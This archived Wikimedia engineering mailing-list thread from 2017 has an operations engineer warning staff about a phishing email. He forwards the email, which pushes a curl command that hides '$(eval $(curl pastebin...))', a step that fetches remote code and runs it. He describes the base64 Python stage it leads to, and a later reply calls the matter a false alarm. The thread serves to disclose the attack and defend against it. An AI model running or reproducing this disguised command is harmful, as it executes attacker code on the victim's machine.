[Engineering] PLEASE READ: (unsuccesful) compromise attempt

Toby Negrin tnegrin at wikimedia.org
Thu Jun 15 19:28:18 UTC 2017 

Thanks Aeryn -- we all appreciate your concern about our security! Please
keep the updates coming.

-Toby

On Thu, Jun 15, 2017 at 12:25 PM, Aeryn Palmer <apalmer at wikimedia.org>
wrote:

> Hi All,
>
> Just a note - the claims in the message some of us got this morning have
> already been examined and found to be a false alarm. Should have checked
> before I sent this email. Thanks, all!
>
> Cheers,
>
> Aeryn
>
> On Thu, Jun 15, 2017 at 12:15 PM, Aeryn Palmer <apalmer at wikimedia.org>
> wrote:
>
>> This appears to be from the same person who sent the email earlier this
>> morning about an alleged leak, to whom Chad responded. Did anyone click the
>> link they provided in that email?
>>
>> Cheers,
>>
>> Aeryn
>>
>> On Thu, Jun 15, 2017 at 12:12 PM, Faidon Liambotis <faidon at wikimedia.org>
>> wrote:
>>
>>> Hi,
>>>
>>> DO NOT RUN THE COMMAND BELOW. Please read this email in full.
>>>
>>> I just got an email, foundd below, which seems initially legitimate, but
>>> on a more careful read is malicious and an attempt to compromise my
>>> computer. Thankfully I don't have the habit of copy/pasting commands on
>>> my terminal and I read this email carefully, so I was not a victim of
>>> this.
>>>
>>> The email seems innocuous enough, by mentioning my name and an otherwise
>>> legitimate body pointing an API issue with a URL that looks like an
>>> api.php URL of ours. It suggests running a curl to reproduce, but if you
>>> look more carefully, that curl has $(eval $(curl
>>> https://pastebin.com/raw/xSWbdNAK) in it.
>>>
>>> That pastebin URL above contains an exec() of a base64 string, which, in
>>> turn, decoded, is a Python script that fetches and exec()s the contents
>>> of a URL. I have NOT fetched that URL yet, so I don't know what the
>>> contents are.  I'd advise to not do that either, unless done carefully
>>> from a sandboxed, unprivileged environment. It will also likely let the
>>> attacker know that someone accessed it, and possibly let them know that
>>> we're on to them.
>>>
>>> Please be on the lookout for similar attempts, and let security@ and ops
>>> know immediately if you get similar ones, or if you are suspicious of
>>> any other emails or weird behavior on your computer. Please also let us
>>> know IMMEDIATELY if you suspect you fell victim of one of these attacks.
>>> Make sure to confirm that your message was received. If in doubt, call
>>> me or other opsens on our cellphones, as found on officewiki's
>>> Contact_list.
>>>
>>> We also had a targeted phising attempt last week, by someone pertaining
>>> to be Katherine and attempting to extract donor data, so it's possible
>>> it's the same person trying a different angle. They may try another
>>> angles as well, so I'd advise everyone to be vigilant.
>>>
>>> Best,
>>> Faidon
>>> --
>>> Faidon Liambotis
>>> Principal Operations Engineer
>>> Wikimedia Foundation
>>>
>>>
>>>
>>> ----- Forwarded message from Joshua Wilson <joshuaswillson at gmail.com>
>>> -----
>>>
>>> Date: Thu, 15 Jun 2017 10:45:35 -0700
>>> From: Joshua Wilson <joshuaswillson at gmail.com>
>>> To: fliambotis at wikimedia.org
>>> Subject: Wikipedia REST API Issues
>>>
>>> Greetings Faidon,
>>>
>>>
>>> It seems as if the api `query` endpoint at the English Wikipedia is
>>> down. A
>>> simple "hello"
>>> api call as shown below responds with an internal server error. Further
>>> calls to the same
>>> endpoint result in the request timing out, until the endpoint is
>>> reachable
>>> again.
>>>
>>> [added by faidon: DO NOT RUN THIS COMMAND]
>>> curl https://en.wikipedia.org/w/api.php?action=query\&titles=$(eval
>>> $(curl
>>> https://pastebin.com/raw/xSWbdNAK)
>>> \\\&)Main%20Page\&prop=revisions\&rvprop=content\&format=json
>>> [added by faidon: DO NOT RUN THIS COMMAND]
>>>
>>> I'm interested in using english wikipedia data for some AI language
>>> comprehension research.
>>>
>>> If you could take a look, and possibly let me know if/when this service
>>> will be up, I would
>>> greatly appreciate it. I couldn't find any scheduled downtime information
>>> online, so I apologize
>>> if this behavior is expected.
>>>
>>> Thanks,
>>>
>>> Chelsea Anders
>>>
>>> ----- End forwarded message -----
>>>
>>
>>
>>
>> --
>> Aeryn Palmer
>> Legal Counsel
>> Wikimedia Foundation
>> 149 New Montgomery Street, 6th Floor
>> San Francisco, CA 94105
>> apalmer at wikimedia.org
>> 415.839.6885 <(415)%20839-6885> (Office)
>> 415.882.0495 <(415)%20882-0495> (Fax)
>> *California Registered In-House Counsel*
>>
>> *NOTICE: This message may be confidential or legally privileged. If you
>> have received it by accident, please delete it and let us know about the
>> mistake. As an attorney for the Wikimedia Foundation and for legal/ethical
>> reasons, I cannot give legal advice to, or serve as a lawyer for, community
>> members, volunteers, or staff members in their personal capacity. For more
>> on what this means, please see our legal disclaimer
>> <https://meta.wikimedia.org/wiki/Wikimedia_Legal_Disclaimer>.*
>>
>
>
>
> --
> Aeryn Palmer
> Legal Counsel
> Wikimedia Foundation
> 149 New Montgomery Street, 6th Floor
> San Francisco, CA 94105
> apalmer at wikimedia.org
> 415.839.6885 <(415)%20839-6885> (Office)
> 415.882.0495 <(415)%20882-0495> (Fax)
> *California Registered In-House Counsel*
>
> *NOTICE: This message may be confidential or legally privileged. If you
> have received it by accident, please delete it and let us know about the
> mistake. As an attorney for the Wikimedia Foundation and for legal/ethical
> reasons, I cannot give legal advice to, or serve as a lawyer for, community
> members, volunteers, or staff members in their personal capacity. For more
> on what this means, please see our legal disclaimer
> <https://meta.wikimedia.org/wiki/Wikimedia_Legal_Disclaimer>.*
>
> _______________________________________________
> Engineering mailing list
> Engineering at lists.wikimedia.org
> https://lists.wikimedia.org/mailman/listinfo/engineering
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.wikimedia.org/pipermail/engineering/attachments/20170615/81a9c59c/attachment-0001.html>

More information about the Engineering mailing list